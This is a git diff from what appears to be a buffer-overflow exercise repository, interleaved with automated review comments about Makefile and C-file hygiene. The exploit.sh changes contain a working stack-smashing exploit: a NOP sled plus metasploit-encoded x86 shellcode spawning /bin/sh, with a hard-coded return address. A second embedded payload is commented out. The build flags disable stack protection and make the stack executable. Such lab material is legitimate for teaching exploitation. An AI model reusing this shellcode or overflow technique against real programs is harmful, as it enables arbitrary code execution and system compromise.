-rw-r--r-- | Makefile | 8 | ||||
-rwxr-xr-x | exploit.sh | 5 | ||||
-rw-r--r-- | shellcode/Makefile | 20 | ||||
-rw-r--r-- | shellcode/simple.c | 11 | ||||
-rw-r--r-- | shellcode/simple2.c | 9 |
5 files changed, 50 insertions, 3 deletions
@@ -5,7 +5,10 @@ CFLAGS = -Wall -g
 OCFLAGS = -m32 -mpreferred-stack-boundary=2 -z execstack -fno-stack-protector
 TARGETS = $(patsubst %.c,%.o,$(wildcard *.c))
-all: $(TARGETS) post-build
+all: shellcode $(TARGETS) post-build
+
+shellcode:
+	make -f shellcode/Makefile SUBDIR=shellcode
 post-build:
 	@read -p "disable protection stuff? (y/N) " answ; \
@@ -28,5 +31,6 @@ disable-prot:
 clean:
 	$(RM) -f $(patsubst %.o,%,$(TARGETS))
+	make -f shellcode/Makefile SUBDIR=shellcode clean
-.PHONY: all clean
+.PHONY: shellcode all clean
@@ -3,6 +3,9 @@
 # shellcode generated with metasploit (exec /bin/sh):
 # ./msfpayload linux/x86/exec cmd=/bin/sh R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
-# 117xNOP (0x90) + shellcode + 117xNOP (0x90) + return addr
+# 117xNOP (0x90) + shellcode(70) + 117xNOP (0x90) + return addr
 ./overflow `python -c 'print "\x90"*117 + "\xd9\xcd\xd9\x74\x24\xf4\xbf\xc9\x14\x15\x14\x5d\x31\xc9\xb1\x0b\x83\xc5\x04\x31\x7d\x16\x03\x7d\x16\xe2\x3c\x7e\x1e\x4c\x27\x2d\x46\x04\x7a\xb1\x0f\x33\xec\x1a\x63\xd4\xec\x0c\xac\x46\x85\xa2\x3b\x65\x07\xd3\x34\x6a\xa7\x23\x6a\x08\xce\x4d\x5b\xbf\x78\x92\xf4\x6c\xf1\x73\x37\x12" + "\x90"*117 + "\x8c\xd3\xff\xff"'`
+
+# shellcode/simple.c
+#./overflow `python -c 'print "\x90"*117 + "\xbb\xd3\x92\x56\xa9\xd9\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1\x0f\x31\x5a\x12\x83\xc2\x04\x03\x89\x9c\xb4\x5c\xc6\x5f\x38\x9f\x18\xa0\x39\x9f\x0c\xa0\x39\x9f\x2c\xa0\x39\x9f\x2d\xda\x6b\x9f\x2c\x62\x9c\x9e\x35\x9e\x9b\xa8\xd9\x9f\xa3\xa8\xcd\x9f\xa3\xa8\xf1\x9f\xa3\xa8\xd1\x5f\x5c\x57\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8\xe3\x9f\xa3\xa8" + "\x90"*104 + "\x8c\xd3\xff\xff"'`
diff --git a/shellcode/Makefile b/shellcode/Makefile
new file mode 100644
index 0000000..c35111d
--- /dev/null
+++ b/shellcode/Makefile
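Review bot: The new `shellcode` recipe calls `make` literally, so the sub-build does not receive `-j`, `-n` or the rest of MAKEFLAGS from the parent; the line added to `clean` in the second hunk has the same problem. Use the `MAKE` variable on both: `	$(MAKE) -f shellcode/Makefile SUBDIR=shellcode` and `	$(MAKE) -f shellcode/Makefile SUBDIR=shellcode clean`. Because `all` lists `shellcode` next to `$(TARGETS)` with no edge between them, the two builds may run concurrently under `-j`; nothing in the hunk suggests one needs the other's output, but if `post-build` is meant to run last that ordering is also not guaranteed.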
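Review bot: The commented-out line labelled `# shellcode/simple.c` does not describe its contents: it embeds an 83-byte hard-coded string, whereas simple.c as added in this commit is an empty `while (1)` loop, so the string cannot be that file's build output. If the line is a placeholder until the `shellcode/` build is wired into the script, say so, e.g. `# TODO: placeholder; not yet the output of shellcode/Makefile`. The comment above the live line was updated to `shellcode(70)`, but the new line's `"\x90"*104` is left unexplained; a matching note such as `# 83-byte payload, 104 trailing NOPs: same 308-byte total as above` keeps the two lines consistent with each other.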
@@ -0,0 +1,20 @@
+RM := rm
+CC := gcc
+LD := ld
+OBJCOPY := objcopy
+CFLAGS = -c -Wall -fpic -Os
+LDFLAGS =
+SUBDIR ?= .
+TARGETS = $(patsubst %.c,%.o,$(wildcard $(SUBDIR)/*.c))
+
+all: $(TARGETS)
+
+%.o : %.c
+	$(CC) $(CFLAGS) -o $@ $<
+	$(LD) $(LDFLAGS) -N -Ttext 0x0 -e _start -Map $(patsubst %.o,%.map,$@) $@ -o $(patsubst %.o,%,$@)
+	$(OBJCOPY) -R .note -R .comment -S -O binary $(patsubst %.o,%,$@) $(patsubst %.o,%.bin,$@)
+
+clean:
+	$(RM) -f $(patsubst %.o,%.map,$(TARGETS)) $(patsubst %.o,%.bin,$(TARGETS)) $(patsubst %.o,%,$(TARGETS)) $(TARGETS)
+
+.PHONY: all clean
diff --git a/shellcode/simple.c b/shellcode/simple.c
new file mode 100644
index 0000000..bf2bf43
--- /dev/null
+++ b/shellcode/simple.c
@@ -0,0 +1,11 @@
+/*
+ * gcc -c -Wall -fpic -Os shellcode.c -o shellcode.o
+ * ld -N -Ttext 0x0 -e _start -Map shellcode.map shellcode.o -o shellcode
+ * objcopy -R .note -R .comment -S -O binary shellcode shellcode.bin
+ */
+
+int _start(void) {
+ while (1) {
+ }
+ return (0);
+}
diff --git a/shellcode/simple2.c b/shellcode/simple2.c
new file mode 100644
index 0000000..341b2de
--- /dev/null
+++ b/shellcode/simple2.c
@@ -0,0 +1,9 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+int _start(void) {
+ while (1) {
+ //printf("Shellcode!\n");
+ }
+ return (0);
+}
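Review bot: The `%.o : %.c` rule writes three files that are not its target (the `.map`, the linked image and the `.bin`), so `all` only tracks the `.o`: once `simple.o` exists, deleting or corrupting `simple.bin` does not trigger a rebuild, and the rule cannot be made parallel-safe per output. The mandatory `-c` also lives in `CFLAGS`, so a user running `make CFLAGS=-g` turns the compile step into a link attempt. Splitting the recipe into one rule per artefact with `.bin` as the goal fixes both; the linked image gets an `.elf` suffix so no match-anything `%: %.o` rule is needed, and `clean` is adjusted accordingly. The `-Map` file remains a side output of the link step, which `clean` still removes.

```make
CFLAGS := -Wall -fpic -Os
# … unchanged: RM/CC/LD/OBJCOPY/LDFLAGS/SUBDIR definitions …
TARGETS := $(patsubst %.c,%.bin,$(wildcard $(SUBDIR)/*.c))

all: $(TARGETS)

# One rule per artefact so every produced file is tracked by name.
%.o: %.c
	$(CC) -c $(CFLAGS) -o $@ $<

%.elf: %.o
	$(LD) $(LDFLAGS) -N -Ttext 0x0 -e _start -Map $*.map -o $@ $<

%.bin: %.elf
	$(OBJCOPY) -R .note -R .comment -S -O binary $< $@

.SECONDARY:   # keep the .o and .elf chain steps, as the original recipe did

clean:
	$(RM) -f $(TARGETS) $(TARGETS:.bin=.elf) $(TARGETS:.bin=.map) $(TARGETS:.bin=.o)
```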
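Review bot: The header comment in simple.c repeats the three build commands with file names (`shellcode.c`, `shellcode.o`, `shellcode.map`, `shellcode`, `shellcode.bin`) that do not match the files this commit actually builds, and the same commands are now encoded in `shellcode/Makefile`, so the two will drift. Replace the command listing with a pointer: `/* Minimal flat-binary test image; built by shellcode/Makefile (cc -c, ld -N -Ttext 0x0 -e _start, objcopy -O binary). */`. The `return (0);` after `while (1) {}` is unreachable and is worth a one-line comment if it is kept deliberately, e.g. `/* unreachable: keeps the signature a valid int function */`.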
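Review bot: simple2.c includes `<stdio.h>` and `<stdlib.h>` but uses nothing from either, and the only call that would need them is the commented-out `printf`; with the link step in `shellcode/Makefile` invoking `ld` directly with no libc, re-enabling that line would fail at link time rather than print. Either drop the two includes, or document the intent above them, e.g. `/* stdio/stdlib kept for the printf experiment below; note the image is linked without libc, so it cannot be enabled as-is */`. Otherwise the file is functionally identical to simple.c, which is worth stating so a reader knows which one the top-level build is expected to use.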